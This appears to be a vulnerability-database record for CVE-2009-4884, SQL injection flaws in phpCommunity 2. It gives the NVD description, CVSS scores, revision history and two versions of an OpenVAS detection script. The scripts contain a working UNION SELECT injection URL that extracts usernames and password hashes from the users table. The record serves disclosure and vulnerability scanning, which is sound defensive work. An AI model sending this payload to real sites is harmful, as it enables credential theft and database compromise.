ID CVE-2009-4884 Type cve Reporter NVD Modified 2018-10-10T15:49:32
Description
Multiple SQL injection vulnerabilities in phpCommunity 2 2.1.8, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via (1) the forum_id parameter in a forum action to index.php, (2) the topic_id parameter in a forum action to index.php, (3) the wert parameter in an id search action to index.php, (4) the wert parameter in a nick search action to index.php, or (5) the wert parameter in a forum search action to index.php, related to class_forum.php and class_search.php.
{"id": "CVE-2009-4884", "bulletinFamily": "NVD", "title": "CVE-2009-4884", "description": "Multiple SQL injection vulnerabilities in phpCommunity 2 2.1.8, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via (1) the forum_id parameter in a forum action to index.php, (2) the topic_id parameter in a forum action to index.php, (3) the wert parameter in an id search action to index.php, (4) the wert parameter in a nick search action to index.php, or (5) the wert parameter in a forum search action to index.php, related to class_forum.php and class_search.php.", "published": "2010-06-11T10:30:12", "modified": "2018-10-10T15:49:32", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4884", "reporter": "NVD", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/49151", "http://www.exploit-db.com/exploits/8185", "http://www.securityfocus.com/archive/1/501588/100/0/threaded"], "cvelist": ["CVE-2009-4884"], "type": "cve", "lastseen": "2018-10-11T11:33:55", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:bernhard_frohlich:phpcom:2.1.8"], "cvelist": ["CVE-2009-4884"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple SQL injection vulnerabilities in phpCommunity 2 2.1.8, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via (1) the forum_id parameter in a forum action to index.php, (2) the topic_id parameter in a forum action to index.php, (3) the wert parameter in an id search action to index.php, (4) the wert parameter in a nick search action to index.php, or (5) the wert parameter in a forum search action to index.php, related to class_forum.php and class_search.php.", "edition": 2, "enchantments": {}, "hash": "15b76ff18a91b86087c25f575969e927662967c4ddcf0c0e3250d7fad62a1922", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "b423793a8377cfcb1a0866f73ebf6b51", "key": "title"}, {"hash": "80d4cb935aada565b7dacecc872d1539", "key": "published"}, {"hash": "aad942282e836b1ac6ac11c321c93754", "key": "references"}, {"hash": "5313f3bb7fe34cbd7c3adfad1e030c36", "key": "href"}, {"hash": "eb37b615ee77064a081f8b4969991db4", "key": "modified"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "60189db8263dad0a06dc1f2eacf47880", "key": "cvelist"}, {"hash": "035453e9e0189191f5ebf4cdc778e852", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "982252ea0db6b2f09062bf422a44e242", "key": "cpe"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4884", "id": "CVE-2009-4884", "lastseen": "2017-08-17T11:14:37", "modified": "2017-08-16T21:31:48", "objectVersion": "1.3", "published": "2010-06-11T10:30:12", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/49151", "http://www.milw0rm.com/exploits/8185", "http://www.securityfocus.com/archive/1/archive/1/501588/100/0/threaded"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-4884", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-08-17T11:14:37"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:bernhard_frohlich:phpcom:2.1.8"], "cvelist": ["CVE-2009-4884"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple SQL injection vulnerabilities in phpCommunity 2 2.1.8, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via (1) the forum_id parameter in a forum action to index.php, (2) the topic_id parameter in a forum action to index.php, (3) the wert parameter in an id search action to index.php, (4) the wert parameter in a nick search action to index.php, or (5) the wert parameter in a forum search action to index.php, related to class_forum.php and class_search.php.", "edition": 3, "enchantments": {"score": {"modified": "2017-09-19T13:36:46", "value": 7.5, "vector": "NONE"}}, "hash": "925c869c66bc358996f754a75853cf9e54d3bd214d4bfd0c60b525fa9768f161", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "b423793a8377cfcb1a0866f73ebf6b51", "key": "title"}, {"hash": "80d4cb935aada565b7dacecc872d1539", "key": "published"}, {"hash": "5313f3bb7fe34cbd7c3adfad1e030c36", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "60189db8263dad0a06dc1f2eacf47880", "key": "cvelist"}, {"hash": "70bf6ea3a0ecc43181bb2936f96694c1", "key": "modified"}, {"hash": "035453e9e0189191f5ebf4cdc778e852", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "982252ea0db6b2f09062bf422a44e242", "key": "cpe"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "a7196d59ce44c81bdaa7c5f4132f1bde", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4884", "id": "CVE-2009-4884", "lastseen": "2017-09-19T13:36:46", "modified": "2017-09-18T21:30:06", "objectVersion": "1.3", "published": "2010-06-11T10:30:12", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/49151", "http://www.exploit-db.com/exploits/8185", "http://www.securityfocus.com/archive/1/archive/1/501588/100/0/threaded"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-4884", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 3, "lastseen": "2017-09-19T13:36:46"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:bernhard_frohlich:phpcom:2.1.8"], "cvelist": ["CVE-2009-4884"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple SQL injection vulnerabilities in phpCommunity 2 2.1.8, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via (1) the forum_id parameter in a forum action to index.php, (2) the topic_id parameter in a forum action to index.php, (3) the wert parameter in an id search action to index.php, (4) the wert parameter in a nick search action to index.php, or (5) the wert parameter in a forum search action to index.php, related to class_forum.php and class_search.php.", "edition": 1, "enchantments": {}, "hash": "ed7a451d05b5dbee221ae17b902d5a89d0b0f8ba2d530ad4fbaf696cb50e9197", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "b423793a8377cfcb1a0866f73ebf6b51", "key": "title"}, {"hash": "80d4cb935aada565b7dacecc872d1539", "key": "published"}, {"hash": "5313f3bb7fe34cbd7c3adfad1e030c36", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "60189db8263dad0a06dc1f2eacf47880", "key": "cvelist"}, {"hash": "cd0a71d4ad4d17fa24d17a887563ab56", "key": "modified"}, {"hash": "e9bce9dcfd9dd30082ba5ceb01cbf88a", "key": "references"}, {"hash": "035453e9e0189191f5ebf4cdc778e852", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "982252ea0db6b2f09062bf422a44e242", "key": "cpe"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4884", "id": "CVE-2009-4884", "lastseen": "2016-09-03T13:18:46", "modified": "2010-06-11T00:00:00", "objectVersion": "1.2", "published": "2010-06-11T10:30:12", "references": ["http://www.milw0rm.com/exploits/8185", "http://xforce.iss.net/xforce/xfdb/49151", "http://www.securityfocus.com/archive/1/archive/1/501588/100/0/threaded"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-4884", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T13:18:46"}], "edition": 4, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "982252ea0db6b2f09062bf422a44e242"}, {"key": "cvelist", "hash": "60189db8263dad0a06dc1f2eacf47880"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "035453e9e0189191f5ebf4cdc778e852"}, {"key": "href", "hash": "5313f3bb7fe34cbd7c3adfad1e030c36"}, {"key": "modified", "hash": "25bf46504d039afe2d950fe975afc454"}, {"key": "published", "hash": "80d4cb935aada565b7dacecc872d1539"}, {"key": "references", "hash": "7f99d792192fdbc28259160203bfcea6"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "b423793a8377cfcb1a0866f73ebf6b51"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d67d95f0a3f3db7322fd19a7bf6dfa7951c665f018aac61e875fd21b8b9d0c49", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-10-11T11:33:55"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310100041", "OPENVAS:100041"]}], "modified": "2018-10-11T11:33:55"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:bernhard_frohlich:phpcom:2.1.8"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"openvas": [{"lastseen": "2017-07-02T21:13:48", "bulletinFamily": "scanner", "description": "phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.", "modified": "2017-03-29T00:00:00", "published": "2009-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=100041", "id": "OPENVAS:100041", "title": "phpCommunity2 Multiple Remote Input Validation Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: phpCommunity2_multiple_remote_input_validation.nasl 5770 2017-03-29 14:34:03Z cfi $\n#\n# phpCommunity2 Multiple Remote Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.\";\n\n\nif (description)\n{\n script_id(100041);\n script_version(\"$Revision: 5770 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-29 16:34:03 +0200 (Wed, 29 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 06:42:27 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2009-4884\", \"CVE-2009-4885\", \"CVE-2009-4886\");\n script_bugtraq_id(34056);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"phpCommunity2 Multiple Remote Input Validation Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/34056/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/phpcom\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23\");\n\n if(http_vuln_check(port:port, url:url,pattern:\"admin:[a-f0-9]{32}\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-20T22:45:39", "bulletinFamily": "scanner", "description": "phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.", "modified": "2019-03-19T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:1361412562310100041", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100041", "title": "phpCommunity2 Multiple Remote Input Validation Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: phpCommunity2_multiple_remote_input_validation.nasl 14330 2019-03-19 13:59:11Z asteins $\n#\n# phpCommunity2 Multiple Remote Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100041\");\n script_version(\"$Revision: 14330 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 14:59:11 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 06:42:27 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2009-4884\", \"CVE-2009-4885\", \"CVE-2009-4886\");\n script_bugtraq_id(34056);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"phpCommunity2 Multiple Remote Input Validation Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"summary\", value:\"phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/34056/\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\n since the disclosure of this vulnerability. Likely none will be provided anymore.\n General solution options are to upgrade to a newer release, disable respective features,\n remove the product or replace the product by another one.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/phpcom\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23\");\n\n if(http_vuln_check(port:port, url:url,pattern:\"admin:[a-f0-9]{32}\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
